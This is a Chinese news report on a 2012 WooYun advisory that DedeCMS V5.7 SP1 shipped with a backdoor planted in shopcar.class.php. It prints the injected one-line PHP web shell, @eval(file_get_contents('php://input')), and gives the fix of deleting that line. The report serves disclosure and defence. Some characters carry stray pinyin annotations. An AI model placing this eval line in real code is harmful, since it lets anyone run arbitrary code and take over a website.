昨日烏云漏洞報(bào)告平臺(http://www.wooyun.org/)發(fā)布漏洞報(bào)告，稱國內(nèi)知名開源CMS軟件Dedecms被入侵種植后門，影響使用dedecms的網(wǎng)站和企業(yè)，后門代碼在/include/shopcar.class.php中，希望直接使用dedecms又未作審計(jì)的網(wǎng)站速度處理。360網(wǎng)站安全檢測官方微博稱經(jīng)過工程師的測試，可以上傳PHP后門來控制整個(gè)網(wǎng)站。目前已經(jīng)將該后門加入到webscan網(wǎng)站安全掃描平臺掃描庫中，希望各網(wǎng)站及時(shí)進(jìn)行掃描確認(rèn)。

　　織夢內(nèi)容管理系統(tǒng)(DedeCms)早期由IT柏拉圖個(gè)人開發(fā)， 以簡單、實(shí)用、開源聞名，受到廣大個(gè)人站長的青睞。DedeCms站長用戶眾多，目前其官方還未對漏洞做出回應(yīng)。希望廣大使用Dedecms的站長能及時(shí)對網(wǎng)站進(jìn)行安全檢測，做好漏洞防范，等待官方給出解決辦法。

　　漏洞概要

　　缺陷編號： WooYun-2012-05416

　　漏洞標(biāo)題： Dedecms疑似被植入后門

　　相關(guān)廠商： Dedecms

　　漏洞作者： jsbug

　　提交時(shí)間： 2012-03-20

　　公開時(shí)間： 2012-03-20

　　漏洞類型： 成功的入侵事件

　　危害等級： 高

　　自評Rank： 10

　　漏洞狀態(tài)： 未聯(lián)系到廠商或者廠商積極忽略

　　漏洞來源： http://www.wooyun.org

　　分享漏洞： 騰訊微博 新浪微博 Twitter 網(wǎng)易微博 豆瓣

　　漏洞詳情

　　披露狀態(tài)：

　　2012-03-20： 積極聯(lián)系廠商并且等待廠商認(rèn)領(lǐng)中，細(xì)節(jié)不對外公開

　　2012-03-20： 廠商已經(jīng)主動(dòng)忽略漏洞，細(xì)節(jié)向公眾公開

　　簡要描述：

　　DedeCMS V5.7 SP1正式版

　　UTF-8 GBK版本疑似被植入一句話后門

　　前幾日下載并不存在此代碼

　　詳細(xì)說明：

　　shopcar.class.php被植入一句話@eval(file_get_contents('php://input'));

　　漏洞證明：

　　shopcar.class.php被植入一句話@eval(file_get_contents('php://input'));

　　修復(fù)方案：

　　刪除@eval(file_get_contents('php://input'));